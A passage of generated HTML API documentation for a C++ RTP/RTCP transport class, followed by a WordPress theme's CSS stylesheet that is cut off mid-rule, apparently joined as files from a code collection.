<LI>enum <A HREF="#ref2">Type</A> { Unknown, RTP, UDPTL } </LI> </ul><h4>Public Methods</h4><ul><LI>&nbsp;<b><A HREF="#ref3">RTPTransport</A></b> (Type type = RTP) </LI> <LI>virtual &nbsp;<b><A HREF="#ref4">~RTPTransport</A></b> () </LI> <LI>virtual void &nbsp;<b><A HREF="#ref5">destruct</A></b> () </LI> <LI>void &nbsp;<b><A HREF="#ref6">setProcessor</A></b> (RTPProcessor* processor = 0) </LI> <LI>void &nbsp;<b><A HREF="#ref7">setMonitor</A></b> (RTPProcessor* monitor = 0) </LI> <LI>inline const SocketAddr& &nbsp;<b><A HREF="#ref8">localAddr</A></b> () const </LI> <LI>inline const SocketAddr& &nbsp;<b><A HREF="#ref9">remoteAddr</A></b> () const </LI> <LI>bool &nbsp;<b><A HREF="#ref10">localAddr</A></b> (SocketAddr& addr, bool rtcp = true) </LI> <LI>bool &nbsp;<b><A HREF="#ref11">remoteAddr</A></b> (SocketAddr& addr, bool sniff = false) </LI> <LI>bool &nbsp;<b><A HREF="#ref12">setBuffer</A></b> (int bufLen = 4096) </LI> <LI>inline bool &nbsp;<b><A HREF="#ref13">setTOS</A></b> (int tos) </LI> <LI>inline Socket* &nbsp;<b><A HREF="#ref14">rtpSock</A></b> () </LI> <LI>inline Socket* &nbsp;<b><A HREF="#ref15">rtcpSock</A></b> () </LI> <LI>bool &nbsp;<b><A HREF="#ref16">drillHole</A></b> () </LI> </ul><h4>Protected Methods</h4><ul><LI>virtual void &nbsp;<b><A HREF="#ref17">timerTick</A></b> (const Time& when) </LI> <LI>virtual void &nbsp;<b><A HREF="#ref18">rtpData</A></b> (const void* data, int len) </LI> <LI>virtual void &nbsp;<b><A HREF="#ref19">rtcpData</A></b> (const void* data, int len) </LI> </ul><HR><H2><A NAME="longdesc">Detailed Description</A></H2><p> Class that holds sockets and addresses for transporting RTP and RTCP packets. </p> <A NAME="Activation"></A><A NAME="ref1"></A><table width="100%"><tr bgcolor="#eeeeee"><td>enum <strong>Activation</strong> { Inactive, Bound, Active } </td><td align="right"><h3><strong>Activation</strong></h3></td></tr></table><p></p><p> Activation status of the transport </p> <A NAME="Type"></A><A NAME="ref2"></A><table width="100%"><tr bgcolor="#eeeeee"><td>enum <strong>Type</strong> { Unknown, RTP, UDPTL } </td><td align="right"><h3><strong>Type</strong></h3></td></tr></table><p></p><p> Type of transported data </p> <A NAME="RTPTransport"></A><A NAME="ref3"></A><table width="100%"><tr bgcolor="#eeeeee"><td>&nbsp;<strong>RTPTransport</strong> (Type type = RTP) <br></td><td align="right"><h3><strong>RTPTransport</strong></h3></td></tr></table><p></p><p> Constructor, creates an unconnected transport </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>type</i></TD><TD align="left" valign="top">Type of check to apply to the data </TD></TR> </TABLE></P> <A NAME="~RTPTransport"></A><A NAME="ref4"></A><table width="100%"><tr bgcolor="#eeeeee"><td> &nbsp;<strong>~RTPTransport</strong> () <br></td><td align="right"><h3><strong>~RTPTransport</strong></h3></td></tr></table><p> <small>[virtual]</small></p><p> Destructor </p> <A NAME="destruct"></A><A NAME="ref5"></A><table width="100%"><tr bgcolor="#eeeeee"><td> void &nbsp;<strong>destruct</strong> () <br></td><td align="right"><h3><strong>destruct</strong></h3></td></tr></table><p> <small>[virtual]</small></p><p> Destroys the object, disposes the memory. Do not call delete directly. </p> <p>Reimplemented from <A HREF="TelEngine__GenObject.html#destruct">GenObject</A>.</p> <A NAME="setProcessor"></A><A NAME="ref6"></A><table width="100%"><tr bgcolor="#eeeeee"><td>void &nbsp;<strong>setProcessor</strong> (RTPProcessor* processor = 0) <br></td><td align="right"><h3><strong>setProcessor</strong></h3></td></tr></table><p></p><p> Set the RTP/RTCP processor of data received by this transport </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>processor</i></TD><TD align="left" valign="top">A pointer to the RTPProcessor for this transport </TD></TR> </TABLE></P> <A NAME="setMonitor"></A><A NAME="ref7"></A><table width="100%"><tr bgcolor="#eeeeee"><td>void &nbsp;<strong>setMonitor</strong> (RTPProcessor* monitor = 0) <br></td><td align="right"><h3><strong>setMonitor</strong></h3></td></tr></table><p></p><p> Set the RTP/RTCP monitor of data received by this transport </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>monitor</i></TD><TD align="left" valign="top">A pointer to a second RTPProcessor for this transport </TD></TR> </TABLE></P> <A NAME="localAddr"></A><A NAME="ref8"></A><table width="100%"><tr bgcolor="#eeeeee"><td>inline const SocketAddr& &nbsp;<strong>localAddr</strong> () <br></td><td align="right"><h3><strong>localAddr</strong></h3></td></tr></table><p> <small>[const]</small></p><p> Get the local network address of the RTP transport </p> <p><b>Returns</b>: Reference to the local RTP transport address </p> <A NAME="remoteAddr"></A><A NAME="ref9"></A><table width="100%"><tr bgcolor="#eeeeee"><td>inline const SocketAddr& &nbsp;<strong>remoteAddr</strong> () <br></td><td align="right"><h3><strong>remoteAddr</strong></h3></td></tr></table><p> <small>[const]</small></p><p> Get the remote network address of the RTP transport </p> <p><b>Returns</b>: Reference to the remote RTP transport address </p> <A NAME="localAddr"></A><A NAME="ref10"></A><table width="100%"><tr bgcolor="#eeeeee"><td>bool &nbsp;<strong>localAddr</strong> (SocketAddr& addr, bool rtcp = true) <br></td><td align="right"><h3><strong>localAddr</strong></h3></td></tr></table><p></p><p> Set the local network address of the RTP transport </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>addr</i></TD><TD align="left" valign="top">New local RTP transport address </TD></TR> <TR><TD align="left" valign="top"><i>rtcp</i></TD><TD align="left" valign="top">Enable RTCP transport </TD></TR> </TABLE></P> <p><b>Returns</b>: True if address set, false if a failure occured </p> <A NAME="remoteAddr"></A><A NAME="ref11"></A><table width="100%"><tr bgcolor="#eeeeee"><td>bool &nbsp;<strong>remoteAddr</strong> (SocketAddr& addr, bool sniff = false) <br></td><td align="right"><h3><strong>remoteAddr</strong></h3></td></tr></table><p></p><p> Set the remote network address of the RTP transport </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>addr</i></TD><TD align="left" valign="top">New remote RTP transport address </TD></TR> <TR><TD align="left" valign="top"><i>sniff</i></TD><TD align="left" valign="top">Automatically adjust the address from the first incoming packet </TD></TR> </TABLE></P> <p><b>Returns</b>: True if address set, false if a failure occured </p> <A NAME="setBuffer"></A><A NAME="ref12"></A><table width="100%"><tr bgcolor="#eeeeee"><td>bool &nbsp;<strong>setBuffer</strong> (int bufLen = 4096) <br></td><td align="right"><h3><strong>setBuffer</strong></h3></td></tr></table><p></p><p> Set the size of the operating system's buffers for the RTP and RTCP sockets </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>bufLen</i></TD><TD align="left" valign="top">Requested length of the buffer </TD></TR> </TABLE></P> <p><b>Returns</b>: True if the buffer length was set </p> <A NAME="setTOS"></A><A NAME="ref13"></A><table width="100%"><tr bgcolor="#eeeeee"><td>inline bool &nbsp;<strong>setTOS</strong> (int tos) <br></td><td align="right"><h3><strong>setTOS</strong></h3></td></tr></table><p></p><p> Set the Type Of Service for the RTP socket </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>tos</i></TD><TD align="left" valign="top">Type Of Service bits to set </TD></TR> </TABLE></P> <p><b>Returns</b>: True if operation was successfull, false if an error occured </p> <A NAME="rtpSock"></A><A NAME="ref14"></A><table width="100%"><tr bgcolor="#eeeeee"><td>inline Socket* &nbsp;<strong>rtpSock</strong> () <br></td><td align="right"><h3><strong>rtpSock</strong></h3></td></tr></table><p></p><p> Get the RTP socket used by this transport </p> <p><b>Returns</b>: Pointer to the RTP socket </p> <A NAME="rtcpSock"></A><A NAME="ref15"></A><table width="100%"><tr bgcolor="#eeeeee"><td>inline Socket* &nbsp;<strong>rtcpSock</strong> () <br></td><td align="right"><h3><strong>rtcpSock</strong></h3></td></tr></table><p></p><p> Get the RTCP socket used by this transport </p> <p><b>Returns</b>: Pointer to the RTCP socket </p> <A NAME="drillHole"></A><A NAME="ref16"></A><table width="100%"><tr bgcolor="#eeeeee"><td>bool &nbsp;<strong>drillHole</strong> () <br></td><td align="right"><h3><strong>drillHole</strong></h3></td></tr></table><p></p><p> Drill a hole in a firewall or NAT for the RTP and RTCP sockets </p> <p><b>Returns</b>: True if at least a packet was sent for the RTP socket </p> <A NAME="timerTick"></A><A NAME="ref17"></A><table width="100%"><tr bgcolor="#eeeeee"><td> void &nbsp;<strong>timerTick</strong> (const Time& when) <br></td><td align="right"><h3><strong>timerTick</strong></h3></td></tr></table><p> <small>[protected virtual]</small></p><p> Method called periodically to read data out of sockets </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>when</i></TD><TD align="left" valign="top">Time to use as base in all computing </TD></TR> </TABLE></P> <p>Reimplemented from <A HREF="TelEngine__RTPProcessor.html#timerTick">RTPProcessor</A>.</p> <A NAME="rtpData"></A><A NAME="ref18"></A><table width="100%"><tr bgcolor="#eeeeee"><td> void &nbsp;<strong>rtpData</strong> (const void* data, int len) <br></td><td align="right"><h3><strong>rtpData</strong></h3></td></tr></table><p> <small>[protected virtual]</small></p><p> This method is called to send a RTP packet </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>data</i></TD><TD align="left" valign="top">Pointer to raw RTP data </TD></TR> <TR><TD align="left" valign="top"><i>len</i></TD><TD align="left" valign="top">Length of the data packet </TD></TR> </TABLE></P> <p>Reimplemented from <A HREF="TelEngine__RTPProcessor.html#rtpData">RTPProcessor</A>.</p> <A NAME="rtcpData"></A><A NAME="ref19"></A><table width="100%"><tr bgcolor="#eeeeee"><td> void &nbsp;<strong>rtcpData</strong> (const void* data, int len) <br></td><td align="right"><h3><strong>rtcpData</strong></h3></td></tr></table><p> <small>[protected virtual]</small></p><p> This method is called to send a RTCP packet </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>data</i></TD><TD align="left" valign="top">Pointer to raw RTCP data </TD></TR> <TR><TD align="left" valign="top"><i>len</i></TD><TD align="left" valign="top">Length of the data packet </TD></TR> </TABLE></P> <p>Reimplemented from <A HREF="TelEngine__RTPProcessor.html#rtcpData">RTPProcessor</A>.</p> <HR> <table> <tr><td><small>Generated by: paulc on bussard on Thu Jul 24 18:41:02 2014, using kdoc 2.0a54.</small></td></tr> </table> </BODY> </HTML>
wp/wp-content/themes/0.01/stylesheet.css
jakeclements/strive
@charset "UTF-8"; /* CSS Document */ /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } /* HTML5 display-role reset for older browsers */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; } table { border-collapse: collapse; border-spacing: 0; } /*--------------- NAVIGATION STYLES ---------------*/ /* make the LI display inline */ /* it's position relative so that position absolute */ /* can be used in submenu */ #main-nav{ height: 80px; /* set to the height you want your menu to be */ margin: 0 auto; /* just to give some spacing */ width: 850px; /* width:960px; if you've got another menu item */ } #main-nav ul{ margin: 0; padding: 0; /* only needed if you have not done a CSS reset */ position:relative; margin-left:10px; } #main-nav li{ display: block; float: left; margin: 0; padding: 0; /* only needed if you don't have a reset */ position: relative; /* this is needed in order to position sub menus */ top:20px; padding-top:23px; margin-left:-2px; margin-right:-2px; } #main-nav li a { display:inline-block; height: 30px; line-height: 30px; padding: 0 15px; color:#f6f1f1; font-size:15px; font-weight:600; top:2px; position:relative; padding-top:23px; margin-top:-23px; } #main-nav .current-menu-item a, #main-nav .current_page_item a, #main-nav a:hover { color: #0099cc; } #main-nav ul ul { /* this targets all sub menus */ display: none; /* hide all sub menus from view */ position: absolute; top: 55px; /* this should be the same height as the top level menu -- height + padding + borders */ -webkit-border-bottom-right-radius: 3px; -webkit-border-bottom-left-radius: 3px; -moz-border-radius-bottomright: 3px; -moz-border-radius-bottomleft: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; padding-bottom:12px; } #main-nav ul ul li { /* this targets all submenu items */ float: left; /* overwriting our float up above */ width: 140px; /* set to the width you want your sub menus to be. This needs to match the value we set below */ color:#FFF; height:auto; display:inline-block; clear:both; } #main-nav ul ul li a { /* target all sub menu item links */ padding: 8px 16px; /* give our sub menu links a nice button feel */ color:#FFF !important; text-align:left; float:left; font-size:12px; line-height:14px; height:auto; border-top:thin #333 solid; border-bottom:thin #666 solid; width:100px; position:relative; left:4px; top:-13px; margin-bottom:0px; } #main-nav ul li:hover > ul { display: block; /* show sub menus when hovering over a parent */ background-color:#1d1c20; } .navicon_home{background:url(img/home_icon.png) top center no-repeat; height:4px; } .navicon_home:hover{background:url(img/home_icon.png) bottom center no-repeat; height:4px;} .navicon_home.current_page_item{background:url(img/home_icon.png) bottom center no-repeat !important; height:4px;} .navicon_about{background:url(img/about_icon.png) top center no-repeat; height:4px; } .navicon_about:hover{background:url(img/about_icon.png) bottom center no-repeat; height:4px;} .navicon_about.current_page_item{background:url(img/about_icon.png) bottom center no-repeat !important; height:4px;} .navicon_people{background:url(img/people_icon.png) top center no-repeat; height:4px; } .navicon_people:hover{background:url(img/people_icon.png) bottom center no-repeat; height:4px;} .navicon_people.current_page_item{background:url(img/people_icon.png) bottom center no-repeat !important; height:4px;} .navicon_service{background:url(img/services_icon.png) top center no-repeat; height:4px; } .navicon_service:hover{background:url(img/services_icon.png) bottom center no-repeat; height:4px;} .navicon_service.current_page_item{background:url(img/services_icon.png) bottom center no-repeat !important; height:4px;} .navicon_timetable{background:url(img/timetable_icon.png) top center no-repeat; height:4px; } .navicon_timetable:hover{background:url(img/timetable_icon.png) bottom center no-repeat; height:4px;} .navicon_timetable.current_page_item{background:url(img/timetable_icon.png) bottom center no-repeat !important; height:4px;} .navicon_blog{background:url(img/blog_icon.png) top center no-repeat; height:4px; } .navicon_blog:hover{background:url(img/blog_icon.png) bottom center no-repeat; height:4px;} .navicon_blog.current_page_item{background:url(img/blog_icon.png) bottom center no-repeat !important; height:4px;} .navicon_gallery{background:url(img/gallery_icon.png) top center no-repeat; height:4px; } .navicon_gallery:hover{background:url(img/gallery_icon.png) bottom center no-repeat; height:4px;} .navicon_gallery.current_page_item{background:url(img/gallery_icon.png) bottom center no-repeat !important; height:4px;} .navicon_shop{background:url(img/shop_icon.png) top center no-repeat; height:4px; } .navicon_shop:hover{background:url(img/shop_icon.png) bottom center no-repeat; height:4px;} .navicon_shop.current_page_item{background:url(img/shop_icon.png) bottom center no-repeat !important; height:4px;} .navicon_contact{background:url(img/contact_icon.png) top center no-repeat; height:4px; } .navicon_contact:hover{background:url(img/contact_icon.png) bottom center no-repeat; height:4px;} .navicon_contact.current_page_item{background:url(img/contact_icon.png) bottom center no-repeat !important; height:4px;} .navicon_coach{background:url(img/coach_icon.png) top center no-repeat; height:4px; } .navicon_coach:hover{background:url(img/coach_icon.png) bottom center no-repeat; height:4px;} .navicon_coach.current_page_item{background:url(img/coach_icon.png) bottom center no-repeat !important; height:4px;} .selected{background-position:bottom; color: #0099cc;} /*--------------- GENERAL STYLES ---------------*/ body{background:url(img/bgr.jpg) repeat top left; text-align:center; margin:0 auto; font-family: 'Open Sans', sans-serif; font-size:12px;} #flair{width:100%; position:absolute; background:url(img/flair.png) right; height:422px; z-index:-1; top:330px; right:5px;} #social{position:relative; top:238px; left:975px; width:32px; height:200px; margin-bottom:-200px;} .fb_16{background:url(img/social16.png); width:16px; height:16px; margin-bottom:6px; } .fb_16:hover{background:url(img/social16.png) 16px 0px;} .twit_16{background:url(img/social16.png) 0px 58px; width:16px; height:16px; margin-bottom:6px; } .twit_16:hover{background:url(img/social16.png) 16px 58px;} .yout_16{background:url(img/social16.png) 0px 37px; width:16px; height:16px; margin-bottom:6px; } .yout_16:hover{background:url(img/social16.png) 16px 37px;} .mail_16{background:url(img/social16.png) 0px 16px; width:16px; height:16px; position:relative; } .mail_16:hover{background:url(img/social16.png) 16px 16px;} #notification{width:100%; height:30px; position:relative; background: #efefef; /* Old browsers */ background: -moz-linear-gradient(top, #efefef 0%, #ffffff 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#efefef), color-stop(100%,#ffffff)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #efefef 0%,#ffffff 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #efefef 0%,#ffffff 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #efefef 0%,#ffffff 100%); /* IE10+ */ background: linear-gradient(to bottom, #efefef 0%,#ffffff 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#efefef', endColorstr='#ffffff',GradientType=0 ); /* IE6-9 */ margin-bottom:15px; border-bottom:thin solid #909090; -webkit-box-shadow: 0px 2px 6px 1px rgba(0, 0, 0, 1); box-shadow: 0px 2px 6px 1px rgba(0, 0, 0, 1); padding-top:14px; text-align:right; color:#1d9649; font-weight:800; letter-spacing:1px; font-size:16px; } #navback{width:100%; height:82px; background-color:#1d1c20; border-top:thin #49484c solid; border-bottom:thin #49484c solid; -webkit-box-shadow: 0px 12px 8px 0px rgba(0, 0, 0, .4); box-shadow: 0px 12px 8px 0px rgba(0, 0, 0, .4); position:relative; top:130px; z-index:8; } a{color:#1f9549; text-decoration:none;} a:hover{text-decoration:underline;} .left{float:left !important;} .right{float:right !important;} .center{margin:0 auto !important; float:none !important;} h1{} h2{} h3{} h4{} h5{} h6{} strong{} .hr{width:100%; height:2px; background:url(img/hr.png); float:left; clear:both; margin-top:4px; margin-bottom:4px;} .lighthr{width:100%; height:3px; background:url(img/lighthr.png); float:left; clear:both; margin-top:4px; margin-bottom:4px;} .title{font-weight:600; color:#1f9549; font-style:italic; font-size:14px; margin-bottom:4px;} .content{} .meta{height:20px; width:auto; padding-left:10px; padding-right:10px; background:#3d3d3d; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; margin:12px 8px 0px 0px; color:#CCC; font-size:10px; padding-top:3px; float:left;} .date:hover{background-color:#1f9549;} .author:hover{background-color:#692f75;} .read-more:hover{background-color:#d2232a;} #wrapper{min-height:200px; position:relative; margin-top:-82px;} #logo{float:left; margin-left:10px;} .slider-wrapper{width:960px; height:422px; border:thin #646464 solid; position:relative; margin-top:118px; float:left; z-index:2;} #home_modules{float:left; margin-top:62px;} .home_mod{width:232px; height:226px; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:url(img/darkbg.jpg) repeat; border:thin #454545 solid; position:relative;} .shine{background:url(img/shine.png); width:218px; height:85px; position:absolute; top:7px; left:7px; opacity:.4;} .modimg{width:218px; height:213px; overflow:hidden; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; margin-top:7px; margin-left:7px;} .modcaption{width:216px; height:35px; background:url(img/black50.png) repeat; position:absolute; bottom:25px; padding-top:18px; color:#FFF; font-style:italic; font-weight:600; font-size:16px; padding-left:7px; padding-right:7px;} #leftbar, #rightbar{margin-top:12px; text-align:left;} #leftbar{margin-left:4px;} .home-events{float:left; margin-bottom:14px; width:580px;} .home-events h3{color:#f1f1f1; font-weight:bold; font-size:18px; margin-bottom:6px; margin-top:6px;} .home-events .innermod{width:574px; height:132px; float:left; margin-left:2px; margin-bottom:4px; margin-top:4px; border:thin #454545 solid; background:url(img/darkbg.jpg) repeat; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px;} .home-events .innermod img{position:relative; top:10px; left:10px; float:left;} .home-events .innermod .postdetails{width:435px; color:#f1f1f1; float:right; padding:6px; margin-top:8px; margin-right:4px; line-height:16px; } #rightbar{ float:right;margin-top:24px; } #rightbar .module{ width:300px; min-height:120px; float:right; background: #dedede; background: -moz-linear-gradient(top, #dedede 0%, #aaaaaa 68%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#dedede), color-stop(68%,#aaaaaa)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #dedede 0%,#aaaaaa 68%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #dedede 0%,#aaaaaa 68%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #dedede 0%,#aaaaaa 68%); /* IE10+ */ background: linear-gradient(to bottom, #dedede 0%,#aaaaaa 68%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#dedede', endColorstr='#aaaaaa',GradientType=0 ); /* IE6-8 */ -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; margin-right:8px; margin-bottom:15px; } #rightbar .module .title{color:#464646; font-weight:800; font-size:14px; font-style:normal; margin-top:12px; margin-left:12px; text-shadow: 0px 1px 0px #fff; filter: dropshadow(color=#fff, offx=0, offy=1); text-align:left; height:13px;} .searchbar{width:170px; height:32px; background:#f1f1f1; border:thin solid #545454; margin-top:2px; margin-bottom:14px; margin-left:-4px; padding-left:8px; padding-right:8px; color:#606060; font-size:11px; font-weight:700; letter-spacing:.8px;} ul.cats{margin-bottom:14px;} ul.cats li{width:100%; text-align:left; padding-bottom:4px; border-bottom:thin #999 solid; margin-left:-2px; padding-top:6px; border-top:thin solid #CCC;} ul.cats li a{position:relative; left:12px; color:#313131; font-weight:700;} .bxslide{ width:300px; height:150px; margin-top:4px;} .bxslideimg{width:284px; height:115px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; float:left; margin-top:8px; border:thin #666 solid; margin-left:6px; margin-top:-2px; overflow:hidden;} .bxslidecap{height:32px; margin:0 auto; width:300px; text-align:center; float:left; margin-top:10px;} .supportslidecap{ margin: 0 auto; width: 240px; text-align: center; float: left; margin-top: 13px; margin-left: 23px; margin-bottom: -25px;} .controllers{width:35px; float:right; margin-right:16px;} .prevslide, .nextslide{ width:14px; height:13px; cursor:pointer; } .prevslide{ float:left; } .nextslide{ float:right;} .bx-next{position:relative; top:-178px; z-index:99; left:260px;} .bx-prev{position:relative; top:-178px; z-index:99; left:250px;} /*TESTIMONIAL Sidebar*/ .bxtest{background:url(img/testimonial.png) no-repeat; width:292px; height:150px; position:relative; margin-left:8px; margin-bottom:20px; float:left;} .bxtest img{margin-top:15px; margin-left:12px; border:thin solid #d3d3d3; float:left;} .bxtest .testim_name{color:#692f75; font-weight:600; float:left; margin-top:17px; margin-left:8px; font-size:14px;} .testim_name .dater{font-weight:700; font-size:12px; color:#666;} .testim_content{float:left; width:195px; margin-left:10px; margin-top:3px; line-height:15px;} .bxtest .read-more{margin-left:12px;} .bxtest .meta{ height:18px; color:#CCC; font-size:10px; padding-top:6px; float:left;} /*Recommend Sidebar*/ .bximg{width:100%; position:relative; padding-bottom:35px; margin-bottom:20px; float:left;} .bximg .const{width:198px; height:129px; float:left; margin-left:45px; margin-top:15px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; overflow:hidden; background:#FFFFFF;} .const img{margin:0 auto; text-align:center;} /*SUBCONTENT*/ #subcontent{width:100%; min-height:300px; background:url(img/darkbg.jpg) repeat; float:left; border-top:thin solid #454545; border-bottom:thin solid #454545;} .third{width:270px; height:280px; float:left;margin-top:8px; text-align:left;} .footitle{font-size:12px; color:#f1f1f1; font-weight:800; margin-top:18px; float:left;} .third ul{float:left; margin-top:12px; margin-left:0px;} .third ul li{font-size:12px; line-height:17px;} .third p{color:#f1f1f1; font-size:12px; line-height:18px; margin-top:12px;} .third .map{float:left; margin-top:14px;position:relative;} .third .map .text{position:absolute; z-index:9; left:118px; top:8px; height:190px; width:146px; color:#FFF; font-size:11px; line-height:18px;} .text b{font-weight:600; font-size:14px;} /*PAGE STYLES*/ .pagetitle{text-align:left; font-size:18px; font-weight:800; font-variant:normal; font-style:normal; color:#f1ecec; margin-top:20px; margin-left:14px; margin-bottom:12px;} #fullflair{width:100%; position:relative; background:url(img/flair.png) right; height:422px; margin-top:-412px; z-index:-1; right:5px;} #pagecontent{padding:18px; padding-bottom:26px; } #pagecontent p{color:#bfbfbf; font-size:13px; font-weight:400; margin-bottom:1em; line-height:18px;} #pagecontent ul{color:#bfbfbf; font-size:13px; font-weight:400; margin-bottom:1em; line-height:18px; list-style:circle;} #pagecontent iframe{margin-left:-3px; margin-bottom:18px;} /* FULL WIDTH PAGE */ #fullbar{background:url(img/darkbg.jpg); width:928px; min-height:150px; margin-top:130px; margin-bottom:108px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; border:1px solid #454545; text-align:left;} /* HALF WIDTH PAGE */ #halfbar{background:url(img/darkbg.jpg); width:730px; min-height:150px; margin-top:130px; margin-bottom:108px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; border:1px solid #454545; text-align:left; float:left;} #barright{width:210px; min-height:200px; float:right; border:thin #FFF solid; margin-top:148px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background: #dedede; background: -moz-linear-gradient(top, #dedede 0%, #aaaaaa 68%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#dedede), color-stop(68%,#aaaaaa)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #dedede 0%,#aaaaaa 68%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #dedede 0%,#aaaaaa 68%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #dedede 0%,#aaaaaa 68%); /* IE10+ */ background: linear-gradient(to bottom, #dedede 0%,#aaaaaa 68%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#dedede', endColorstr='#aaaaaa',GradientType=0 ); /* IE6-8 */ padding-bottom:5px; margin-bottom:24px;} .rightmod{display:block; margin-bottom:24px;} .moduletitle{color:#464646; font-weight:800; font-size:14px; font-style:normal; margin-top:12px; margin-left:10px; text-shadow: 0px 1px 0px #fff; filter: dropshadow(color=#fff, offx=0, offy=1); text-align:left; } .modcontent{width:210px; float:left; padding-left:2px; margin-bottom:12px;} /* Blog Archive PAGE */ .blogarch{width:690px; height:164px; float:left; margin-bottom:10px; border:thin #3f3f41 solid; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px;} .blogarch .img{ background:url(img/black50.png); width:131px; height:134px; border:thin #333 solid; float:left; margin-left:13px; margin-top:13px;} .blogarch .img img{margin:0 auto; position:relative; left:7px; top:7px; width:119px; height:120px;} .blogarch .postdetails{width:420px; float:left; margin-top:18px; margin-left:24px; color:#dadada; } .blogarch .postdetails .title{color:#f5f5f5; font-weight:900; font-size:14px; font-style:normal;] letter-spacing:1.6px; clear:both; margin-bottom:6px;} .blogarch .postdetails .content{ line-height:18px; font-size:12px; height:75px; } .blogarch .postdetails .meta-cont{width:510px; height:22px; background:#080001; margin-left:-6px; margin-top:6px;} .blogarch .postdetails .meta-cont .blread-more{color:#0099cc; float:left; margin-top:5px; margin-left:6px;} .blogarch .postdetails .meta-cont .bldate{float:right; margin-top:5px; margin-right:6px;} #wpnavi{height:45px; width:100%; float:left; margin-bottom:25px;} /* OUR PEOPLE MODULE */ .teammember{width:207px; height:314px; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:url(img/darkbg.jpg) repeat; border:thin #454545 solid; position:relative; margin-top:4px; margin-bottom:12px; margin-right:7px; margin-left:7px;} .teammember .modcaption{width:193px; height:35px; background:url(img/black50.png) repeat; position:absolute; bottom:25px; padding-top:18px; color:#FFF; font-style:italic; font-weight:600; font-size:16px; padding-left:7px; padding-right:7px; text-align:center; } .teammember .modimg{width:193px; height:300px; overflow:hidden; margin-top:7px; margin-left:7px;} /*FOOTER*/ #footer{height:70px; background:#1d1c20; border-bottom:thin solid #454545; float:left; width:100%; margin-bottom:45px; -webkit-box-shadow: 0px 2px 6px 1px rgba(0, 0, 0, .4); box-shadow: 0px 2px 6px 1px rgba(0, 0, 0, .4); text-align:center; padding-top:18px; color:#333;} #footer a{color:#666;} #footer .copyright{margin-top:12px; color:#444;} #footer .copyright a{margin-top:12px; color:#444;} /*FOOTER MENU STYLES*/ #footmenu{height:8px; text-align:center;} #footmenu ul{margin:0 auto; width:960px; text-align:center;} #footmenu li{display:inline;} #footmenu li:after{ content:" | "; } /*PAGE NAVI STYLES*/ .wp-pagenavi{width:450px; height:30px; float:left; color:#999;} .wp-pagenavi .pages, .wp-pagenavi .current{ background:#222; padding:8px; padding-right:10px; float:left; margin-right:6px; border:thin solid #444;} .wp-pagenavi .current{background:#000; color:#CCC;} .wp-pagenavi .page{background:#222; padding:8px; padding-right:10px; float:left; margin-right:6px; border:thin solid #444;} .wp-pagenavi .nextpostslink, .wp-pagenavi .previouspostslink{background:#222; padding:8px; padding-right:10px; float:left; margin-right:6px; border:thin solid #444;} strong{font-weight:bold;} .staffrole{width:410px; 